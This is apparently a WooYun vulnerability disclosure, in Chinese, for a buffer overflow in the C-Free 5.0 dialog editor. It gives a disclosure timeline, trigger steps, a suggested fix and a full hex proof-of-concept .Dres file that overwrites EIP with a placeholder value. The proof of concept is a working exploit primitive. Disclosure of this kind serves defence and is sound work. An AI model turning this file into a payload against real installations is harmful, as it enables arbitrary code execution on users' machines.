[公开漏洞]c-Free 5.0 对话框编辑器 缓冲区溢出漏洞

来源:WooYun 浏览:670次 时间:2014-06-12
做网站找雨过天晴工作室
c-Free 5.0 对话框编辑器 缓冲区溢出漏洞 相关厂商: c-Free 漏洞作者:光刃 提交时间:2014-03-05 17:48 公开时间:2014-06-03 17:48 漏洞类型:设计错误/逻辑缺陷 危害等级:高 自评Rank:15 漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源:http://www.wooyun.org Tags标签: 缓冲区溢出 漏洞详情 披露状态:

2014-03-05:细节已通知厂商并且等待厂商处理中
2014-03-10:厂商已经确认,细节仅向厂商公开
2014-03-13:细节向第三方安全合作伙伴开放
2014-03-20:细节向核心白帽子及相关领域专家公开
2014-03-30:细节向普通白帽子公开
2014-04-19:细节向实习白帽子公开
2014-06-03:细节向公众公开

简要描述:

未对长度进行检测,造成缓冲区溢出。EIP可控。
攻击者可以构造特定的.Dres文件,即可利用此漏洞执行任意想执行的程序。
程序名称:dlgedit.exe
版本信息:Microsoft Dialog Editor Version 3.10.200

详细说明:

poc:把下面数据以16进制的形式保存在文件中(大小为740H) 偏移656H处(我这里写的是CCCCCCCC)就是我们要修改的EIP地址

0000000020000000FFFF0000FFFF0000000000000000000000000000000000000007000020000000FFFF0500FFFF640000000000301000000000000000000000C000C890000000000000060012001C01B00000000000610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100610061006100313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131CCCCCCCC3131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131313131316100000008004D00530020005300680065006C006C00200044006C0067000000

漏洞证明:

文件偏移656H处为要修改的EIP,这里我们用cccccccc实验

第一步 打开我们构造的文件,打开后稍微移动一下对话框

1.png





第二步 选择EDIT-STYLES(或者Ctrl+Y) 然后取消。然后就触发了

2.png





我们发现EIP已经是我们要设置的CCCCCCCC了

3.png





4.png



修复方案:

检测大小

版权声明:转载请注明来源 光刃@乌云 漏洞回应 厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-10 21:19

厂商回复:

最新状态:

暂无